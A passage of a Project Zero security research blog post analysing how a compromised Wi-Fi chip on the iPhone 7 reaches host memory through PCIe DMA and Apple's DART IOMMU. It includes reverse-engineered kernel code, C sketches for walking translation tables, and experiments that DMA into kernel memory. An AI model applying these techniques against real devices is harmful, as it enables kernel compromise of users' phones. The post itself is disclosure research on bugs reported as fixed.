Over The Air - Vol. 2, Pt. 3: Exploiting The Wi-Fi Stack on Apple Devices

Google Project Zero - Wed, 10/11/2017 - 12:41
Posted by Gal Beniamini, Project Zero
In this blog post we’ll complete our goal of achieving remote kernel code execution on the iPhone 7, by means of Wi-Fi communication alone.
After developing a Wi-Fi firmware exploit in the previous blog post, we are left with the task of using our newly acquired access to gain control over the XNU kernel. To this end, we’ll begin by investigating the isolation mechanisms present on the iPhone. Next, we’ll explore the ways in which the host interacts with the Wi-Fi chip, identify several attack surfaces, and assess their corresponding security properties. Finally, we’ll discover multiple vulnerabilities and proceed to develop a fully functional, reliable exploit for one of them, allowing us to gain control over the host’s kernel.

All the vulnerabilities presented in this blog post (#1, #2, #3, #4, #5, #6, #7) were reported to Apple and subsequently fixed in iOS 11. For an analysis of other affected devices in the Apple ecosystem, see the corresponding security bulletins.

Hardware Isolation

PCIe DMA
Broadcom’s Wi-Fi chips are present in a wide range of platforms, including mobile phones, IoT devices and Wi-Fi routers. To accommodate this variance, each chip must be sufficiently configurable, supporting several different interfaces for vendors wishing to integrate the chip into their platform. Indeed, Cypress’s data sheets include a wide range of supported interfaces, including PCIe, SDIO and USB.

While choosing the interface with which to integrate the chip may seem inconsequential, it could have far ranging security implications. Each interface comes with different security guarantees, affecting the degree to which the peripheral may be “isolated” from the host. As we’ve already demonstrated how the Wi-Fi chip’s security can be subverted by remote attackers, it’s clear that providing isolation is crucial in sufficiently safeguarding the host.
From a security perspective, both SDIO and USB (up to 3.1) inherently offer some degree of isolation. SDIO solely enables the serial transfer of information between the host and the target device. Similarly, USB allows the transfer of “packets” between peripherals and the host. Broadly speaking, both interfaces can be thought of as facilitating an explicit communication channel between the host and the peripheral. All the data transported through these interfaces must be explicitly handled by either peer, by inspecting incoming requests and responding accordingly.
PCIe operates using a different paradigm. Instead of communicating with the host using a communication protocol, PCIe allows peripherals to gain Direct Memory Access (DMA) to the host’s memory. Using DMA, peripherals may autonomously prepare data structures within the host’s memory, only signalling the host (via a Message Signalled Interrupt) once there’s processing to be done. Operating in this manner allows the host to conserve computing resources, as opposed to protocols that require processing to transfer data between endpoints or to handle each individual request.
Efficient as this approach may be, it also raises some challenges with regards to isolation. First and foremost, how can we be guaranteed that malicious peripherals won’t abuse this access in order to attack the host? After all, in the presence of full control over the host’s memory, subverting any program running on the host is trivial (for example, peripherals may freely modify a program’s stack, alter function pointers, overwrite code -- all unbeknownst to the host itself).
Luckily, this issue has not gone unaddressed. Sufficient isolation for DMA-capable components can be achieved by partitioning the visible memory space available to the peripheral using a dedicated hardware component - an I/O Memory Management Unit (IOMMU).

IOMMUs facilitate a memory translation service for peripherals, converting their addressable memory ranges (referred to as “IO-Space”) into ranges within the host’s Physical Address Space (PAS). Configuring the IOMMU’s translation tables allows the host to selectively control which portions of its memory are exposed to each peripheral, while safeguarding other ranges against potentially malicious access. Consequently, the bulk of the responsibility for providing sufficient isolation lies with the host.
Returning to the issue at hand, as we are focusing on the Wi-Fi stack present within Apple’s ecosystem, an immediate question springs to mind -- which interfaces does Apple leverage to connect the Wi-Fi chip to the host? Inspecting the Wi-Fi firmware images present in several generations of Apple devices reveals that since the iPhone 6 (included), Apple has opted for PCIe to connect the Wi-Fi chip to the host. Older models, such as the iPhone 5c and 5s, relied on a USB interface instead.

Due to the risks highlighted above, it is crucial that recent iPhones utilise an IOMMU to isolate themselves from potentially malicious PCIe-connected Wi-Fi chips. Indeed, during our previous research into the isolation mechanisms on Android devices, we discovered that no isolation was enforced in two of the most prominent SoCs; Qualcomm’s Snapdragon 810 and Samsung’s Exynos 8890, thereby allowing the Wi-Fi chip to freely access the host’s memory (leading to complete compromise of the device).

Inspecting the DMA Engine
To gain some visibility into the isolation capabilities present on the iPhone 7, we’ll begin by exploring the Wi-Fi firmware itself. If a form of isolation is present, the memory ranges used by the Wi-Fi SoC to perform DMA operations and those utilised by the host would be disparate. Conversely, if we happen to find the same ranges of physical addresses, that would hint that no isolation is taking place.
Luckily, much of the complexity involved in reverse-engineering the firmware’s DMA functionality can be forgone, as Broadcom’s SoftMAC drivers (brcm80211) contain the majority of the code used to interface with the SoC’s DMA engine.
Each DMA engine facilitates transfers in a single direction between two endpoints; one representing the Wi-Fi firmware, and another denoting either an internal core within the Wi-Fi SoC (such as when interacting with the RX or TX FIFOs) or the host itself. As we are interested in inspecting the memory ranges used for transfers originating in the Wi-Fi chip and terminating at the host, we must locate the DMA engine responsible for “dongle-to-host” memory transfers.
As it happens, this task is rather straightforward. Each “dma_info” structure in the firmware (representing a DMA engine) is prefixed by a pointer to a block of DMA-related function pointers stored in the firmware’s RAM. Since the block is placed at a fixed address, we can locate all instances of the structure by searching for the pointer within the firmware’s RAM. For each instance we come across, inspecting the “name” field encoded in the structure should allow us to deduce the identity of the DMA engine in question.
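The search described above can be sketched in a few lines of C. This is only an illustration under stated assumptions: the firmware's RAM is available as a byte buffer, pointers are 32-bit little-endian words stored at 4-byte alignment, and the names `find_pointer_refs` and `table_ptr` are hypothetical (the actual address of the function-pointer block is not given here).

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Read a little-endian 32-bit word from a byte buffer. */
static uint32_t read_le32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/*
 * Scan a RAM dump for 4-byte-aligned words equal to `table_ptr`
 * (hypothetical: the fixed address of the DMA function-pointer block).
 * Stores up to `max_hits` matching offsets in `hits` and returns the
 * total number of matches, which may exceed `max_hits`.
 */
size_t find_pointer_refs(const uint8_t *ram, size_t ram_len, uint32_t table_ptr,
                         size_t *hits, size_t max_hits) {
    assert(ram != NULL);
    assert(hits != NULL || max_hits == 0);
    size_t count = 0;
    for (size_t off = 0; off + 4 <= ram_len; off += 4) {
        if (read_le32(ram + off) == table_ptr) {
            if (count < max_hits) {
                hits[count] = off;
            }
            count++;
        }
    }
    return count;
}
```

Each returned offset marks the start of a candidate “dma_info” instance; the “name” field would then be read relative to that offset to identify the engine.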

Combining these two tidbits, we can quickly locate each DMA engine in the firmware’s RAM:

The first few instances clearly relate to internal DMA engines. The last instance, labeled “H2D”, indicates “host-to-dongle” memory transfers. Therefore, by elimination, the single entry left must correspond to transfers from the dongle to the host (sneakily left unnamed!).
Having located the engine, all that remains is to dump the RX descriptor ring and extract the addresses to which DMA transfers are performed. Unfortunately, descriptors are rapidly consumed after being inserted into the corresponding rings, replacing their contents with generic placeholder values. Therefore, observing the value of a non-consumed descriptor from a single memory snapshot is tricky. Instead, to extract “fresh” descriptors, we’ll insert a hook on the DMA transfer function, allowing us to dump descriptor addresses before they are inserted into the corresponding rings.
After inserting the hook, we are presented with the following output:

All of the descriptor addresses appear to be 32-bits wide...
How do the above addresses relate to our knowledge of the physical address space on the iPhone 7? The DRAM’s base address in the host’s physical address space is denoted by the “gPhysBase” variable (stored in the kernel’s BSS). Reading this value from our research platform will allow us to determine whether the DMA descriptor addresses correspond to host-side physical ranges:

Ah-ha! The iPhone 7’s DRAM is based at 0x800000000 -- an address beyond a 32-bit range.
Therefore, some form of conversion is taking place between the ranges visible to the Wi-Fi chip (IO-Space) and those corresponding to the host’s physical address space. To locate the root cause of this conversion, let’s shift our attention back towards the host.

DART
The host and the Wi-Fi chip communicate with one another using a protocol designed by Broadcom, dubbed “MSGBUF”. Using the protocol, both endpoints are able to transmit and receive control messages, as well as traffic, through a set of “message rings”. Each ring is stored within the host’s memory, but is also made accessible to the firmware through DMA.
Since the rings must be accessible through DMA to the Wi-Fi chip, locating the code responsible for their initialisation might shed some light on the process through which their physical addresses are converted to the DMA-accessible addresses we encountered in the firmware’s DMA descriptors.
Reverse-engineering AppleBCMWLANBusInterfacePCIe, we quickly arrive at the function responsible for initialising the IPC structures utilised by the Wi-Fi chip and the host, including the aforementioned rings:
    void* init_ring(void* this, uint64_t alignment, IOMapper* mapper, ...) {
        ...
        IOOptionBits options = kIOMemoryTypeVirtual | kIODirectionOutIn;
        IOBufferMemoryDescriptor* desc =
            IOBufferMemoryDescriptor::inTaskWithOptions(kernel_task,
                                                        options,
                                                        capacity,
                                                        alignment);
        ...
        IODMACommand* cmd = IODMACommand::withSpecification(
            IODMACommand::OutputLittle64,  //outSegFunc
            0,                             //numAddressBits
            0,                             //maxSegmentSize
            0,                             //mappingOptions
            0,                             //maxTransferSize
            1,                             //alignment
            mapper,                        //mapper
            0);                            //refCon
        ...
        cmd->setMemoryDescriptor(desc, true);
        ...
    }

function 0xFFFFFFF006D1C074
As we can see above, the function utilises I/O Kit APIs to manage and map DMA-capable descriptors.
Upon closer inspection, we can see that IODMACommand defers the actual mapping operations to the provided IOMapper instance (“mapper” in the snippet above). However, as luck would have it, the same “mapper” object is stored within the “PCIe object” we identified in the first part of our research. Therefore, we can proceed to extract the IOMapper instance and begin tracing through its associated code paths.
While the source code for IOMapper is available in the open-sourced portions of XNU, it does not perform any actual mapping operations, but rather delegates them to the “System Mapper” - a globally registered IOMapper instance. Since no concrete subclasses of IOMapper are present in the open-sourced portions of XNU, we can assume that a specialised subclass, performing the actual mapping implementation, exists in one of the proprietary KEXTs.
Indeed, following the extracted IOMapper’s virtual table, we arrive at the IODARTMapper class, under -- it seems a specialised IOMapper is used after all!
Before we continue down the rabbit hole, let’s take a step back and assess the situation. According to Apple’s documentation, DART stands for “Device Address Resolution Table” -- a hardware component integrated into the memory controller, whose purpose it is to provide a separate address space mapping for 32-bit PCI peripherals. DART allows the system to map physical addresses beyond the 32-bit range to peripherals, and to provide fine-grained control over exposed memory ranges to each device. In short, this is none other than a proprietary IOMMU designed by Apple!
Digging deeper into IODARTMapper, we find iovmInsert; the entry point for inserting new IO-Space translations through a mapper. Passing through several more layers of indirection, we finally arrive at an instance of AppleS5L8960XDART.

The latter object originates in a different driver; it appears we’re getting closer to the bare-metal DART implementation for the SoC! Oddly, the driver references “S5L8960X”; the product code for the Apple A7 SoC (used in older iPhones, such as the 5s). Perhaps this artefact suggests that the same DART implementation has been used in prior SoC revisions.
Taking a closer look at AppleS5L8960XDART, we quickly come across a function of particular interest. This function performs many bit shifts and masks, much like we’d expect from translation-table management code. After spending some time familiarising ourselves with the code, we come to the realisation that the function is responsible for populating DART’s translation tables! Here is a high-level representation of the relevant code:
    void* create_descriptors(void* this, uint64_t table_index,
                             uint32_t start_pfn, uint32_t map_size, ...) {

        ... //Validate input arguments, acquire mutex
        void** dart_table = ((void***)(this + 312))[table_index];
        uint32_t end_pfn  = start_pfn + map_size;

        //Populating each L0 descriptor in the range
        uint32_t l0_start_idx = (start_pfn >> 18) & 0x3;
        uint32_t l0_end_idx   = (end_pfn   >> 18) & 0x3;

        for (uint32_t l0_idx = l0_start_idx; l0_idx <= l0_end_idx; l0_idx++) {

            //Creating the L1 table if it doesn’t already exist
            struct l1_table_t* l1_table = (struct l1_table_t*)(dart_table[l0_idx]);
            if (!l1_table) {
                l1_table = allocate_l1_table(this);
                dart_table[l0_idx] = l1_table;
                uint64_t table_phys = l1_table->desc->getPhysicalSegment(...);
                uint64_t l0_desc = ((table_phys >> 12) & 0xFFFFFF) | 0x80000000;
                OSSynchronizeIO();
                set_l0_desc(this, table_index, l0_idx, l0_desc);
            }

            //Calculating the range of L1 descriptors to populate
            uint32_t l1_start_idx = (l0_idx == l0_start_idx) ?
                                         (start_pfn >> 9) & 0x1FF : 0;
            uint32_t l1_end_idx   = (l0_idx == l0_end_idx) ?
                                         (end_pfn   >> 9) & 0x1FF : 511;

            //Populating each L1 descriptor in the range
            for (uint32_t l1_idx = l1_start_idx; l1_idx <= l1_end_idx; l1_idx++) {

                //Creating the L2 table if it doesn’t already exist
                struct l2_table_t* l2_table;
                l2_table = (struct l2_table_t*)l1_table->l2_tables[l1_idx];
                if (!l2_table) {
                    l2_table = allocate_l1_desc(this);
                    l1_table->l2_tables[l1_idx] = l2_table;
                    uint64_t table_phys = l2_table->desc->getPhysicalSegment(...);
                    l1_table->descriptors[l1_idx] = (table_phys & 0xFFFFFF000) | 3;
                    OSSynchronizeIO();
                    ...
                }
            }
        }
        ... //Release mutex
    }

    struct l1_table_t {
        IOBufferMemoryDescriptor* desc;      //Descriptor holding L1 table
        uint64_t* descriptors;               //Kernel VA ptr to L1 descs
        struct l2_table_t* l2_tables[512];   //L2 descriptors within this table
    };

    struct l2_table_t {
        IOBufferMemoryDescriptor* desc;     //Descriptor holding L2 table
        uint64_t* descriptors;              //Kernel VA ptr to L2 descs
        uint64_t unknown;
    };

function 0xFFFFFFF0065978F0
Alright! Let’s take a moment to unpack the above function.
For starters, it appears that DART utilises a 3-level translation regime. The first level is capable of holding up to four descriptors, while each subsequent level holds 512 descriptors. Since DART uses a 4KB translation granule, we can deduce that each L2 table maps up to 0x200000 bytes (512 x 4KB) of IO-Space, while each L1 table maps up to 0x40000000 bytes (512 x 0x200000).
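To make the arithmetic concrete, here is a small C sketch that splits a 32-bit IO-Space address into per-level indices and computes the span of each table. The L0 and L1 shifts and masks are taken from the function above; the L2 index (the low 9 bits of the page frame number) is our inference from the 512-entry table size, and all names (`dart_split`, `dart_join`, and so on) are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

#define DART_PAGE_SHIFT  12u   /* 4KB translation granule */
#define DART_TABLE_BITS  9u    /* 512 descriptors per L1/L2 table */

struct dart_indices {
    uint32_t l0;        /* index into the (up to four) L0 descriptors */
    uint32_t l1;        /* index into the selected L1 table */
    uint32_t l2;        /* index into the selected L2 table (inferred) */
    uint32_t page_off;  /* byte offset within the 4KB page */
};

/* Split a 32-bit IO-Space address into table indices. */
struct dart_indices dart_split(uint32_t io_addr) {
    uint32_t pfn = io_addr >> DART_PAGE_SHIFT;
    struct dart_indices idx;
    idx.l0 = (pfn >> (2 * DART_TABLE_BITS)) & 0x3;
    idx.l1 = (pfn >> DART_TABLE_BITS) & 0x1FF;
    idx.l2 = pfn & 0x1FF;
    idx.page_off = io_addr & 0xFFF;
    return idx;
}

/* Inverse of dart_split: rebuild the IO-Space address from indices. */
uint32_t dart_join(struct dart_indices idx) {
    assert(idx.l0 < 4 && idx.l1 < 512 && idx.l2 < 512 && idx.page_off < 4096);
    uint32_t pfn = (idx.l0 << 18) | (idx.l1 << 9) | idx.l2;
    return (pfn << DART_PAGE_SHIFT) | idx.page_off;
}

/* Bytes of IO-Space covered by a single L2 table and a single L1 table. */
uint64_t dart_l2_table_span(void) { return (uint64_t)512 << DART_PAGE_SHIFT; }
uint64_t dart_l1_table_span(void) { return 512 * dart_l2_table_span(); }
```

Under these assumptions, four L0 descriptors of 0x40000000 bytes each cover exactly the 4GB addressable by a 32-bit peripheral.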
In addition to the 3-level regime specified above, DART holds four “base descriptors”. Unlike regular descriptors, these are not indexed by bits in the IO-Space address, but are instead referenced explicitly using a parameter provided by the caller.
Drawing on our knowledge of PCIe, we can speculate on the nature of these “base descriptors”. Perhaps each DART can facilitate mappings for several different PCI peripherals on the same bus, where each “base descriptor” corresponds to one such device (based on the “Requester-ID” encoded in the incoming TLP)? Whether or not this is the case, dumping the “base descriptors” in the DART instance corresponding to the Wi-Fi chip reveals that only the first descriptor is populated in our case.
In order to access the DART mappings, two distinct sets of data structures are utilised in tandem; a set of “convenience” structures which map the translation hierarchy into high-level objects within the kernel’s virtual address space, and another set holding the descriptors themselves, which are linked together based on physical addresses. The former set is used by the kernel to conveniently locate and modify DART’s mappings, while the latter is used by DART’s hardware to perform the actual IO-Space translations.

Looking more closely at the descriptors, it appears that the translation format utilised by DART is proprietary, and does not match the formats present in the ARM VMSA (including those utilised by SMMUs). Nonetheless, we can deduce the descriptors’ composition by inspecting the code above, which constructs and populates descriptors across the translation hierarchy.
L0 descriptors encode the physical frame number (using a 4KB translation granule) corresponding to the next level table in the lower bits, and set bit 31 (0x80000000) to indicate a valid entry. L1 and L2 descriptors, on the other hand, use the bottom two bits to indicate validity (setting both bits denotes a valid entry, other combinations result in translation faults), while the top bits store the physical address of either the next translation table or of the 4KB region mapped into IO-Space.
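The descriptor layouts described above can be captured in a handful of helpers. This is a sketch based only on the masks visible in the function shown earlier (0xFFFFFF, 0x80000000, 0xFFFFFF000 and the low two bits); the helper names are hypothetical, and the page-alignment assertion is our assumption.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

#define DART_L0_VALID      0x80000000ull   /* bit 31 marks a valid L0 entry */
#define DART_L0_PFN_MASK   0xFFFFFFull     /* frame number of the L1 table */
#define DART_DESC_VALID    0x3ull          /* both low bits set => valid */
#define DART_DESC_PA_MASK  0xFFFFFF000ull  /* physical address bits */

/* Build an L0 descriptor pointing at a (page-aligned) L1 table. */
uint64_t dart_make_l0(uint64_t table_phys) {
    assert((table_phys & 0xFFF) == 0);
    return ((table_phys >> 12) & DART_L0_PFN_MASK) | DART_L0_VALID;
}

/* Build an L1 or L2 descriptor for a table or a mapped 4KB page. */
uint64_t dart_make_l1_l2(uint64_t phys) {
    return (phys & DART_DESC_PA_MASK) | DART_DESC_VALID;
}

/* Decode an L0 descriptor; returns false for an invalid entry. */
bool dart_decode_l0(uint64_t desc, uint64_t *table_phys) {
    assert(table_phys != NULL);
    if (!(desc & DART_L0_VALID)) {
        return false;
    }
    *table_phys = (desc & DART_L0_PFN_MASK) << 12;
    return true;
}

/* Decode an L1 or L2 descriptor; returns false unless both low bits are set. */
bool dart_decode_l1_l2(uint64_t desc, uint64_t *phys) {
    assert(phys != NULL);
    if ((desc & DART_DESC_VALID) != DART_DESC_VALID) {
        return false;
    }
    *phys = desc & DART_DESC_PA_MASK;
    return true;
}
```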

Lastly, we must deduce IO-Space’s base address to complete our analysis of DART’s translation format. Drawing on our previous encounter with IO-Space addresses stored in the DMA descriptors within the Wi-Fi firmware, all the addresses appeared to be based at address 0x80000000. As such, it seems like a fair assumption that IO-Space mappings for the Wi-Fi chip begin at the aforementioned address.
Combining all of the information above, let’s build a module in our research platform to interact with the DART instance. The module will analyse DART’s translation tables, following the hierarchy described above. By analysing the translation tables, we can subsequently hold a mapping between IO-Space addresses and their corresponding physical ranges within the host’s PAS. Furthermore, we can invert the tables in order to produce a PAS to IO-Space mapping. Using these two mappings we can subsequently convert IO-Space addresses to physical addresses, and vice versa.
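As a rough illustration of what the translation half of such a module does, the following C sketch walks the three levels for a single IO-Space address. It is not the research platform's code: it assumes the L0 descriptors have already been read out into an array, that the L1 and L2 tables are available in a snapshot of physical memory (the hypothetical `phys_window`), that descriptors are 8 bytes wide and little-endian, and that the L2 index is the low 9 bits of the page frame number.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical snapshot of the physical memory holding the tables. */
struct phys_window {
    uint64_t base;        /* physical address of data[0] */
    const uint8_t *data;
    size_t len;
};

/* Read a little-endian 64-bit descriptor at physical address `pa`. */
static bool read_phys64(const struct phys_window *w, uint64_t pa, uint64_t *out) {
    if (pa < w->base) return false;
    uint64_t off = pa - w->base;
    if (off > w->len || w->len - off < 8) return false;
    uint64_t v = 0;
    for (int i = 7; i >= 0; i--) v = (v << 8) | w->data[off + i];
    *out = v;
    return true;
}

/* Translate one IO-Space address; returns false on a translation fault. */
bool dart_translate(const uint64_t l0_descs[4], const struct phys_window *w,
                    uint32_t io_addr, uint64_t *phys_out) {
    assert(l0_descs != NULL && w != NULL && phys_out != NULL);
    uint32_t pfn = io_addr >> 12;

    uint64_t l0 = l0_descs[(pfn >> 18) & 0x3];
    if (!(l0 & 0x80000000ull)) return false;           /* bit 31: valid */
    uint64_t l1_table = (l0 & 0xFFFFFFull) << 12;

    uint64_t l1;
    if (!read_phys64(w, l1_table + 8ull * ((pfn >> 9) & 0x1FF), &l1)) return false;
    if ((l1 & 3) != 3) return false;                   /* low bits: valid */
    uint64_t l2_table = l1 & 0xFFFFFF000ull;

    uint64_t l2;
    if (!read_phys64(w, l2_table + 8ull * (pfn & 0x1FF), &l2)) return false;
    if ((l2 & 3) != 3) return false;

    *phys_out = (l2 & 0xFFFFFF000ull) | (io_addr & 0xFFF);
    return true;
}
```

Note that with this layout an IO-Space address of 0x80000000 selects L0 index 2. Running the walk over every valid L2 entry yields the IO-Space to PAS mapping, and recording each (physical page, IO-Space page) pair while doing so gives the inverse mapping.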
Finally, in addition to inspecting IO-Space, our DART module also allows us to manipulate IO-Space, by introducing new mappings into IO-Space containing whichever physical address we desire.
At long last, we can test whether our deductions regarding DART’s structure are indeed valid. First, let’s extract the DART instance corresponding to the Wi-Fi chip. Then, using this object, we can proceed to dump the entire mapping between IO-Space addresses and their corresponding physical ranges by following DART’s translation hierarchy:

Great! The first few mappings appear sane -- each IO-Space address is translated into a corresponding physical range well within the host’s PAS. Moreover, we can see that our assumption regarding DART’s translation granule holds, as some mapped physical addresses are within a 4KB range from one another.
To be absolutely certain that our assessment is valid, let’s perform another short experiment. We’ll map-in an unused IO-Space address, pointing it at a physical address corresponding to “spare” data within the kernel’s BSS. Next, using the DMA hook we inserted previously, we’ll direct unconsumed DMA descriptors at the newly mapped IO-Space address. By doing so, subsequent DMA transfers should arrive at our chosen BSS address.
After inserting the hook and monitoring the mapped BSS range (by reading it through the kernel’s VAS), we are presented with the following result:

Awesome! We managed to DMA into an arbitrary physical address within the kernel’s BSS, thus confirming that our understanding of DART is correct.

Exploring DART
Using our newly acquired control over IO-Space, we can proceed to conduct a few experiments.
For starters, it would be interesting to see whether the kernel integrity mechanisms present on the iPhone 7 (“KTRR”, previously referred to as “AMCC”), still hold in the presence of malicious DMA attempts from the Wi-Fi chip. To find out, we’ll map each of the protected physical ranges (the kernel’s code segments, read-only segments, etc.) into IO-Space, insert the DMA hook, and observe their contents to see whether they were successfully modified.
Unsurprisingly, each attempt to DMA into a protected region results in a fault being raised, subsequently triggering a kernel panic and crashing the device. Attempting to DMA into the KTRR’s hardware registers storing protected region ranges similarly fails -- once the lockdown occurs, no modification of the registers is permitted.

Continuing our analysis of DART, let’s consider another edge-case scenario: assume two adjacent IO-Space mappings correspond to non-contiguous ranges of physical memory. In such a case, should DMA operations crossing the boundary between the two IO-Space ranges be permitted? If so, should the data be split across the corresponding physical ranges? Or should the transfer instead only utilise the first physical range?
To find out, we’ll conduct another experiment. First, we’ll create two IO-Space mappings pointing at disparate regions in the Kernel’s BSS. Then, using the DMA engine, we’ll initiate a transfer crossing the boundary between the two IO-Space addresses.

Running the above experiment and monitoring the resulting addresses through the kernel’s VAS, we are presented with a positive result -- DART correctly splits the transaction into the two corresponding physical ranges, thus never exceeding any of the mapped-in regions’ bounds.
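The observed behaviour is equivalent to translating each 4KB page of the transfer independently. The C sketch below models that splitting step in software; it is our own illustration of the result of the experiment, not a description of how DART's hardware implements it, and the names are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define IO_PAGE_SIZE 0x1000u   /* 4KB translation granule */

struct dma_chunk {
    uint32_t io_addr;  /* start of the chunk in IO-Space */
    uint32_t len;      /* chunk length; never crosses a page boundary */
};

/*
 * Split the transfer [io_addr, io_addr + len) at 4KB boundaries, so that
 * each chunk can be translated on its own. Stores up to `max_chunks`
 * entries in `out` and returns the total number of chunks.
 */
size_t split_at_page_boundaries(uint32_t io_addr, uint32_t len,
                                struct dma_chunk *out, size_t max_chunks) {
    assert((uint64_t)io_addr + len <= 0x100000000ull);
    assert(out != NULL || max_chunks == 0);
    size_t count = 0;
    while (len > 0) {
        uint32_t room = IO_PAGE_SIZE - (io_addr & (IO_PAGE_SIZE - 1));
        uint32_t n = len < room ? len : room;
        if (count < max_chunks) {
            out[count].io_addr = io_addr;
            out[count].len = n;
        }
        count++;
        io_addr += n;
        len -= n;
    }
    return count;
}
```

For example, a 0x300-byte transfer starting at IO-Space address 0x80000F00 becomes two chunks: 0x100 bytes ending the first page and 0x200 bytes starting the second, each landing in whichever physical page its IO-Space page maps to.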
So far, so good.

PCIe Configuration Space
Continuing our investigation of DART, we arrive at another query -- how does DART perform context determination? Namely, how does DART differentiate between the components issuing the memory access requests?
Depending on DART’s architecture, several solutions to this question exist. If each DART is assigned to a single component or a single PCIe bus, no identification is needed, as it can simply funnel all operations from that origin through its translation mechanism. Alternatively, if several PCIe components exist on the bus to which DART is assigned, it could utilise the “Requester ID” (RID) field in the PCIe TLP to identify the originating component.
Using the RID for context determination is not risk-free, as malicious PCIe components may attempt to “spoof” the contents of their TLPs. To deal with such scenarios, PCIe introduced Access Control Services (ACS), allowing PCIe switches to perform routing decisions, including disallowing transfer of certain TLPs based on their encompassed IDs. As we are not aware of the PCIe topology on the iPhone, it remains unknown whether such a configuration is needed (or used).
With regards to control over the PCIe TLPs, Broadcom’s Wi-Fi chips expose much of the PCIe Core’s functionality to the Wi-Fi firmware by mapping the core’s registers through a fixed backplane address. Previous Broadcom SoC revisions, which incorporated PCIe Gen 1 cores, allowed access to several “diagnostic” registers (via pcieindaddr / pcieinddata), which govern the physical (PLP), data link (DLLP) and transaction (TLP) layers of PCIe. Regardless, it is unknown whether this mechanism allows modification of the RID, or indeed whether this form of access is still present in current-gen Broadcom hardware.
Nevertheless, standardised PCIe mechanisms exist which may also affect the RID’s composition. For instance, PCIe 3.0 introduced Alternate Routing-ID Interpretation (ARI), which modifies the encoding of the RID, eliminating the “device” field while expanding the “function” field to 8 bits.
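The two interpretations of the 16-bit RID can be compared side by side in C. The field layout follows the standard PCIe encoding (an 8-bit bus number, followed by either a 5-bit device and 3-bit function, or a single 8-bit function under ARI); the struct and function names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

struct rid_fields {
    uint8_t bus;
    uint8_t device;    /* always 0 under ARI, where the field is removed */
    uint8_t function;
};

/* Encode a conventional RID: bus[15:8], device[7:3], function[2:0]. */
uint16_t rid_encode(uint8_t bus, uint8_t device, uint8_t function) {
    assert(device < 32 && function < 8);
    return (uint16_t)(((uint16_t)bus << 8) | ((uint16_t)device << 3) | function);
}

/* Decode a RID using the conventional bus/device/function layout. */
struct rid_fields rid_decode(uint16_t rid) {
    struct rid_fields f;
    f.bus = (uint8_t)(rid >> 8);
    f.device = (uint8_t)((rid >> 3) & 0x1F);
    f.function = (uint8_t)(rid & 0x7);
    return f;
}

/* Decode a RID under ARI: bus[15:8], function[7:0]. */
struct rid_fields rid_decode_ari(uint16_t rid) {
    struct rid_fields f;
    f.bus = (uint8_t)(rid >> 8);
    f.device = 0;
    f.function = (uint8_t)(rid & 0xFF);
    return f;
}
```

The same 16 bits therefore identify different components depending on whether ARI is enabled, which is why the feature is relevant to RID-based context determination.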

While normally the PCIe Configuration Space is accessed through the host, Broadcom’s Wi-Fi SoC exposes the configuration space within the Wi-Fi SoC, through a pair of backplane registers corresponding to the PCIe Core (configaddr / configdata). Using these registers, the Wi-Fi firmware can not only read the PCIe Configuration Space, but also modify values within it. Like many advanced PCIe features, ARI is exposed in the configuration space through an “extended capability” blob; therefore, if ARI is supported by the PCIe core, we could utilise our access to the configuration space to enable the feature from the Wi-Fi firmware.
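Given a dump of the configuration space, checking for a particular extended capability amounts to walking a linked list. The C sketch below assumes a byte-array dump of the 4KB configuration space and uses the standard PCIe layout: extended capabilities start at offset 0x100, and each 32-bit header holds the capability ID in bits 15:0 and the offset of the next capability in bits 31:20. The ARI capability ID (0x000E) is the standard value; the function name is hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define PCIE_EXT_CAP_START   0x100u    /* first extended capability header */
#define PCIE_EXT_CAP_ID_ARI  0x000Eu   /* Alternative Routing-ID Interpretation */

/* Read a little-endian 32-bit register from a configuration space dump. */
static uint32_t cfg_read32(const uint8_t *cfg, size_t off) {
    return (uint32_t)cfg[off] | ((uint32_t)cfg[off + 1] << 8) |
           ((uint32_t)cfg[off + 2] << 16) | ((uint32_t)cfg[off + 3] << 24);
}

/*
 * Walk the extended capability list looking for `cap_id`.
 * Returns the offset of the matching capability header, or -1 if absent.
 */
long find_ext_capability(const uint8_t *cfg, size_t cfg_len, uint16_t cap_id) {
    assert(cfg != NULL);
    size_t off = PCIE_EXT_CAP_START;
    /* The guard bounds the walk in case a malformed list contains a loop. */
    for (int guard = 0; guard < 1024; guard++) {
        if (off < PCIE_EXT_CAP_START || (off & 3) || off + 4 > cfg_len) {
            return -1;
        }
        uint32_t hdr = cfg_read32(cfg, off);
        if (hdr == 0 || hdr == 0xFFFFFFFFu) {
            return -1;  /* no (further) extended capabilities */
        }
        if ((hdr & 0xFFFFu) == cap_id) {
            return (long)off;
        }
        off = hdr >> 20;  /* next capability offset; 0 terminates the list */
        if (off == 0) {
            return -1;
        }
    }
    return -1;
}
```

Calling `find_ext_capability(dump, 4096, PCIE_EXT_CAP_ID_ARI)` on such a dump would report whether the core advertises ARI at all.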
To determine whether such capabilities are present in the PCIe core, we’ll produce a dump of the configuration space (using the aforementioned register pair). After doing so, we can simply reorganise the contents in a format legible to lspci, and instruct it to parse the given data, producing a human-readable representation of the features supported by the PCIe core:

Scanning through the above capabilities, it appears that none of the “advanced” PCIe features (such as ARI) are supported by the PCIe core.

Exploring IO-Space
While we’ve already determined how DART facilitates the IO-Space mapping for the Wi-Fi chip, we have yet to investigate the contents of the memory exposed through this mechanism. In order to investigate IO-Space’s contents, we’ll use a two-stage translation process; first, we’ll use our DART module to produce a mapping between the IO-Space addresses and their corresponding physical ranges. Once we obtain the mapped physical ranges, all that remains is to map these ranges into the kernel’s VAS, allowing us to subsequently dump their contents using our research platform.
As we know, the mapping from virtual to physical addresses is governed by the MMU’s translation tables. On ARMv8-A platforms (such as the iPhone 7), the ARM Virtual Memory System Architecture (VMSA) specifies the format of the translation tables utilised by the ARM MMU. As with any XNU task, the kernel’s translation tables are accessible through its task_t structure (exported through its data segment). Following the entries in the task structure, we arrive at its pmap, holding the translation tables.
